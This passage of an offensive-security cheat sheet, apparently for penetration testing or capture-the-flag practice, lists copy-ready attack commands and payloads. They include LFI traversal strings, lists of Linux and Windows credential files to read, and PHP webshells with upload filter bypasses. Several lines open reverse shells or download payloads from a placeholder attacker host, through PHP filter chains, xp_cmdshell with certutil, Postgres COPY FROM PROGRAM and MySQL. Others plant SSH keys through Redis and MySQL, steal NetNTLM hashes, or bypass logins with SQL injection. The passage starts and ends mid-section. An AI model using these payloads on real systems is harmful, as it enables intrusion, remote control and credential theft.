<RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain ``` ##### Specifiy User Agent ```shell gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ -a Linux ``` #### Local File Inclusion (LFI) ```shell http://<RHOST>/<FILE>.php?file= http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd ``` ##### Until php 5.3 ```shell http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd%00 ``` ##### Null Byte ```shell %00 0x00 ``` ##### Encoded Traversal Strings ```shell ../ ..\ ..\/ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ...\.\ ``` ##### php://filter Wrapper > https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb > https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion > https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter ```shell url=php://filter/convert.base64-encode/resource=file:////var/www/<RHOST>/api.php ``` ```shell http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd base64 -d <FILE>.php ``` ##### Django, Rails, or Node.js Web Application Header Values ```shell Accept: ../../../../.././../../../../etc/passwd{{ Accept: ../../../../.././../../../../etc/passwd{%0D Accept: ../../../../.././../../../../etc/passwd{%0A Accept: ../../../../.././../../../../etc/passwd{%00 Accept: ../../../../.././../../../../etc/passwd{%0D{{ Accept: ../../../../.././../../../../etc/passwd{%0A{{ Accept: ../../../../.././../../../../etc/passwd{%00{{ ``` ##### Linux Files ```shell /app/etc/local.xml /etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf /etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow /etc/at.deny /etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny /etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts /etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log /etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini /etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf /etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release /etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf /etc/network/interfaces /etc/networks /etc/npasswd /etc/passwd /etc/php4.4/fcgi/php.ini /etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini /etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini /etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini /etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf /etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf /etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf /etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf /opt/xampp/etc/php.ini /proc/cmdline /proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules /proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc/<PID>/cmdline /proc/<PID>/maps /proc/sched_debug /proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat /proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini /usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log /usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini /usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php /usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf /usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf /usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl /usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl /var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log /var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf /var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log /var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log /var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog /var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog /var/log/exim/rejectlog /var/log/faillog /var/log/ftplog /var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log /var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log /var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message /var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log /var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root /var/webmin/miniserv.log /var/www/html<VHOST>/__init__.py /var/www/html/db_connect.php /var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log /var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history ~/.bash_history ~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history ~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa ~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc ~/.Xresources ~/.xsession ``` ##### Windows Files ```shell C:/Users/Administrator/NTUser.dat C:/Documents and Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log C:/Program Files/Apache Group/Apache/logs/error.log C:/Program Files/FileZilla Server/FileZilla Server.xml C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml C:/Windows/System32/inetsrv/config/applicationHost.config C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log ``` #### PDF PHP Inclusion Create a file with a PDF header, which contains PHP code. ```shell %PDF-1.4 <?php system($_GET["cmd"]); ?> ``` ```shell http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami ``` #### PHP Upload Filter Bypasses ```shell .sh .cgi .inc .txt .pht .phtml .phP .Php .php3 .php4 .php5 .php7 .pht .phps .phar .phpt .pgif .phtml .phtm .php%00.jpeg ``` ```shell <FILE>.php%20 <FILE>.php%0d%0a.jpg <FILE>.php%0a <FILE>.php.jpg <FILE>.php%00.gif <FILE>.php\x00.gif <FILE>.php%00.png <FILE>.php\x00.png <FILE>.php%00.jpg <FILE>.php\x00.jpg mv <FILE>.jpg <FILE>.php\x00.jpg ``` #### PHP Filter Chain Generator > https://github.com/synacktiv/php_filter_chain_generator ```shell python3 php_filter_chain_generator.py --chain '<?= exec($_GET[0]); ?>' python3 php_filter_chain_generator.py --chain "<?php echo shell_exec(id); ?>" python3 php_filter_chain_generator.py --chain """<?php echo shell_exec(id); ?>""" python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"");?>"""" python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"");?>"""" ``` ```shell http://<RHOST>/?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4 ``` ```shell python3 php_filter_chain_generator.py --chain '<?= exec($_GET[0]); ?>' [+] The following gadget chain will generate the following code : <?= exec($_GET[0]); ?> (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg) php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=<COMMAND> ``` ```shell python3 php_filter_chain_generator.py --chain "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1\"'); ?>" | grep "^php" > <FILE> ``` ```shell curl "http://<RHOST>/index.php?file=$(cat <FILE>)" ``` #### PHP Generic Gadget Chains (PHPGGC) ```shell phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/<FILE>.txt /PATH/TO/FILE/<FILE>.txt ``` #### Server-Side Request Forgery (SSRF) ```shell https://<RHOST>/item/2?server=server.<RHOST>/file?id=9&x= ``` #### Server-Side Template Injection (SSTI) ##### Fuzz String > https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti ```shell ${{<%[%'"}}%\. ``` ##### Magic Payload > https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee ```shell {{ ‘’.__class__.__mro__[1].__subclasses__() }} ``` #### Upload Vulnerabilities ```shell ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution SVG: Stored XSS / Server-Side Request Forgery GIF: Stored XSS CSV: CSV Injection XML: XXE AVI: Local File Inclusion / Server-Side request Forgery HTML/JS: HTML Injection / XSS / Open Redirect PNG / JPEG: Pixel Flood Attack ZIP: Remote Code Exection via Local File Inclusion PDF / PPTX: Server-Side Request Forgery / Blind XXE ``` #### wfuzz ```shell wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<RHOST>/FUZZ/<FILE>.php --hc '403,404' ``` ##### Write to File ```shell wfuzz -w /PATH/TO/WORDLIST -c -f <FILE> -u http://<RHOST> --hc 403,404 ``` ##### Custom Scan with limited Output ```shell wfuzz -w /PATH/TO/WORDLIST -u http://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20 ``` ##### Fuzzing two Parameters at once ```shell wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c ``` ##### Domain ```shell wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.<RHOST>' -u http://<RHOST>/ ``` ##### Subdomain ```shell wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<RHOST>" --hc 200 --hw 356 -t 100 <RHOST> ``` ##### Git ```shell wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://<RHOST>/FUZZ --hc 403,404 ``` ##### Login ```shell wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "email=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST> --hc 200 -c wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "username=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST> --ss "Invalid login" ``` ##### SQL ```shell wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<RHOST>/select http ``` ##### DNS ```shell wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ.<RHOST>" --filter "r.headers.response~'Access-Control-Allow-Origin'" http://<RHOST>/ wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -t 100 wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> --hw <value> -t 100 ``` ##### Numbering Files ```shell wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip ``` ##### Enumerating PIDs ```shell wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000 ``` #### WPScan ```shell wpscan --url https://<RHOST> --enumerate u,t,p wpscan --url https://<RHOST> --plugins-detection aggressive wpscan --url https://<RHOST> --disable-tls-checks wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50 ``` #### XML External Entity (XXE) ##### Skeleton Payload Request ```shell GET / HTTP/1.1 Host: <RHOST>:<RPORT> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Length: 136 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE test [<!ENTITY xxe SYSTEM "http://<LHOST>:80/shell.php" >]> <foo>&xxe;</foo> ``` ##### Payloads ```shell <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xxe [ <!ENTITY passwd SYSTEM 'file:///etc/passwd'> ]> <stockCheck><productId>&passwd;</productId><storeId>1</storeId></stockCheck> ``` ```shell <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]><order><quantity>3</quantity><item>&test;</item><address>17th Estate, CA</address></order> ``` ```shell username=%26username%3b&version=1.0.0--><!DOCTYPE+username+[+<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!-- ``` ### Database Analysis #### impacket-mssqlclient ##### Common Commands ```shell enum_logins enum_impersonate ``` ##### Connection ```shell impacket-mssqlclient <USERNAME>@<RHOST> impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth impacket-mssqlclient -k -no-pass <RHOST> impacket-mssqlclient <RHOST>/<USERNAME>:<USERNAME>@<RHOST> -windows-auth ``` ```shell export KRB5CCNAME=<USERNAME>.ccache impacket-mssqlclient -k <RHOST>.<DOMAIN> ``` #### MongoDB ```shell mongo "mongodb://localhost:27017" ``` ```shell > use <DATABASE>; > show tables; > show collections; > db.system.keys.find(); > db.users.find(); > db.getUsers(); > db.getUsers({showCredentials: true}); > db.accounts.find(); > db.accounts.find().pretty(); > use admin; ``` ##### User Password Reset to "12345" ```shell > db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } }) ``` #### MSSQL ##### Connection ```shell sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>' impacket-mssqlclient <USERNAME>:<PASSWORD>@<RHOST> -windows-auth ``` ##### Common Commands ```shell SELECT @@version; SELECT name FROM sys.databases; SELECT * FROM <DATABASE>.information_schema.tables; SELECT * FROM <DATABASE>.dbo.users; ``` ##### Show Database Content ```shell 1> SELECT name FROM master.sys.databases 2> go ``` ##### OPENQUERY ```shell 1> select * from openquery("web\clients", 'select name from master.sys.databases'); 2> go ``` ```shell 1> select * from openquery("web\clients", 'select name from clients.sys.objects'); 2> go ``` ##### Binary Extraction as Base64 ```shell 1> select cast((select content from openquery([web\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64; 2> go > export.txt ``` ##### Steal NetNTLM Hash / Relay Attack ```shell SQL> exec master.dbo.xp_dirtree '\\<LHOST>\FOOBAR' ``` ##### Linked SQL Server Enumeration ```shell SQL> SELECT user_name(); SQL> SELECT name,sysadmin FROM syslogins; SQL> SELECT srvname,isremote FROM sysservers; SQL> EXEC ('SELECT current_user') at [<DOMAIN>\<CONFIG_FILE>]; SQL> EXEC ('SELECT srvname,isremote FROM sysservers') at [<DOMAIN>\<CONFIG_FILE>]; SQL> EXEC ('EXEC (''SELECT suser_name()'') at [<DOMAIN>\<CONFIG_FILE>]') at [<DOMAIN>\<CONFIG_FILE>]; ``` ##### xp_cmdshell ```shell SQL> EXECUTE AS LOGIN = 'sa'; SQL> EXEC sp_configure 'Show Advanced Options', 1; SQL> RECONFIGURE; SQL> EXEC sp_configure 'xp_cmdshell', 1; SQL> RECONFIGURE; SQL> EXEC xp_cmdshell 'dir'; ``` ```shell SQL> EXEC sp_configure 'Show Advanced Options', 1; SQL> reconfigure; SQL> sp_configure; SQL> EXEC sp_configure 'xp_cmdshell', 1; SQL> reconfigure SQL> xp_cmdshell "whoami" ``` ```shell SQL> enable_xp_cmdshell SQL> xp_cmdshell whoami ``` ```shell ';EXEC master.dbo.xp_cmdshell 'ping <LHOST>';-- ';EXEC master.dbo.xp_cmdshell 'certutil -urlcache -split -f http://<LHOST>/shell.exe C:\\Windows\temp\<FILE>.exe';-- ';EXEC master.dbo.xp_cmdshell 'cmd /c C:\\Windows\\temp\\<FILE>.exe';-- ``` #### MySQL ```shell mysql -u root -p mysql -u <USERNAME> -h <RHOST> -p mysql -u <USERNAME> -h <RHOST> -p --skip-ssl ``` ```shell mysql> STATUS; mysql> SHOW databases; mysql> USE <DATABASE>; mysql> SHOW tables; mysql> DESCRIBE <TABLE>; mysql> SELECT version(); mysql> SELECT system_user(); mysql> SELECT * FROM Users; mysql> SELECT * FROM users \G; mysql> SELECT Username,Password FROM Users; musql> SELECT user, authentication_string FROM mysql.user WHERE user = '<USERNAME>'; mysql> SELECT LOAD_FILE('/etc/passwd'); mysql> SELECT LOAD_FILE('C:\\PATH\\TO\\FILE\\<FILE>'); mysql> SHOW GRANTS FOR '<USERNAME>'@'localhost' \G; ``` ##### Update User Password ```shell mysql> update user set password = '37b08599d3f323491a66feabbb5b26af' where user_id = 1; ``` ##### Drop a Shell ```shell mysql> \! /bin/sh ``` ##### Insert Code to get executed ```shell mysql> insert into users (id, email) values (<LPORT>, "- E $(bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1')"); ``` ##### Write SSH Key into authorized_keys2 file ```shell mysql> SELECT "<KEY>" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '\n'; ``` #### NoSQL Injection ```shell admin'||''===' {"username": {"$ne": null}, "password": {"$ne": null} } ``` #### PostgreSQL ```shell psql psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;" psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE> psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE> ``` ##### Common Commands ```shell postgres=# \list // list all databases postgres=# \c // use database postgres=# \c <DATABASE> // use specific database postgres=# \s // command history postgres=# \q // quit <DATABASE>=# \dt // list tables from current schema <DATABASE>=# \dt *.* // list tables from all schema <DATABASE>=# \du // list users roles <DATABASE>=# \du+ // list users roles <DATABASE>=# SELECT user; // get current user <DATABASE>=# TABLE <TABLE>; // select table <DATABASE>=# SELECT usename, passwd from pg_shadow; // read credentials <DATABASE>=# SELECT * FROM pg_ls_dir('/'); -- // read directories <DATABASE>=# SELECT pg_read_file('/PATH/TO/FILE/<FILE>', 0, 1000000); -- // read a file ``` ##### Postgres Remote Code Execution ```shell <DATABASE>=# DROP TABLE IF EXISTS cmd_exec; <DATABASE>=# CREATE TABLE cmd_exec(cmd_output text); <DATABASE>=# COPY cmd_exec FROM PROGRAM 'id'; <DATABASE>=# SELECT * FROM cmd_exec; <DATABASE>=# DROP TABLE IF EXISTS cmd_exec; ``` or ```shell <DATABASE>=# COPY (SELECT pg_backend_pid()) TO PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f'; <DATABASE>=# COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<LHOST>:<LPORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'''; <DATABASE>=# COPY (SELECT CAST('cp /bin/bash /var/lib/postgresql/bash;chmod 4777 /var/lib/postgresql/bash;' AS text)) TO '/var/lib/postgresql/.profile';" ``` #### Redis ```shell > AUTH <PASSWORD> > AUTH <USERNAME> <PASSWORD> > INFO SERVER > INFO keyspace > CONFIG GET * > SELECT <NUMBER> > KEYS * > HSET // set value if a field within a hash data structure > HGET // retrieves a field and his value from a hash data structure > HKEYS // retrieves all field names from a hash data structure > HGETALL // retrieves all fields and values from a hash data structure > GET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b > SET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b "username|s:8:\"<USERNAME>\";role|s:5:\"admin\";auth|s:4:\"True\";" # the value "s:8" has to match the length of the username ``` ##### Enter own SSH Key ```shell redis-cli -h <RHOST> echo "FLUSHALL" | redis-cli -h <RHOST> (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /PATH/TO/FILE/<FILE>.txt cat /PATH/TO/FILE/<FILE>.txt | redis-cli -h <RHOST> -x set s-key <RHOST>:6379> get s-key <RHOST>:6379> CONFIG GET dir 1) "dir" 2) "/var/lib/redis" <RHOST>:6379> CONFIG SET dir /var/lib/redis/.ssh OK <RHOST>:6379> CONFIG SET dbfilename authorized_keys OK <RHOST>:6379> CONFIG GET dbfilename 1) "dbfilename" 2) "authorized_keys" <RHOST>:6379> save OK ``` #### SQL Injection ##### Master List ```shell ';#--- // insert everywhere! Shoutout to xsudoxx! admin' or '1'='1 ' or '1'='1 " or "1"="1 " or "1"="1"-- " or "1"="1"/* " or "1"="1"# " or 1=1 " or 1=1 -- " or 1=1 - " or 1=1-- " or 1=1/* " or 1=1# " or 1=1- ") or "1"="1 ") or "1"="1"-- ") or "1"="1"/* ") or "1"="1"# ") or ("1"="1 ") or ("1"="1"-- ") or ("1"="1"/* ") or ("1"="1"# ) or '1`='1- ``` ##### Authentication Bypass ```shell '-' ' ' '&' '^' '*' ' or 1=1 limit 1 -- -+ '="or' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' '-||0' "-||0" ' || '1'='1';-- - "-" " " "&" "^" "*" '--' "--" '--' / "--" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 2 like 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' -- - admin' # admin'/* admin' or '2' LIKE '1 admin' or 2 LIKE 2-- admin' or 2 LIKE 2# admin') or 2 LIKE 2# admin') or 2 LIKE 2-- admin') or ('2' LIKE '2 admin') or ('2' LIKE '2'# admin') or ('2' LIKE '2'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin';-- azer admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` #### Common Injections ##### MySQL & MariaDB ###### Get Number of Columns ```shell -1 order by 3;# ``` ###### Get Version ```shell -1 union select 1,2,version();# ``` ###### Get Database Name ```shell -1 union select 1,2,database();# ``` ###### Get Table Name ```shell -1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema="<DATABASE>";# ``` ###### Get Column Name ```shell -1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema="<DATABASE>" and table_name="<TABLE>";# ``` ###### Read a File ```shell SELECT LOAD_FILE('/etc/passwd') ``` ###### Dump Data ```shell -1 union select 1,2, group_concat(<COLUMN>) from <DATABASE>.<TABLE>;# ``` ###### Create Webshell ```shell LOAD_FILE('/etc/httpd/conf/httpd.conf') select "<?php system($_GET['cmd']);?>" into outfile "/var/www/html/<FILE>.php"; ``` or ```shell LOAD_FILE('/etc/httpd/conf/httpd.conf') ' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/<FILE>.php" -- // ``` ##### MSSQL ###### Authentication Bypass ```shell 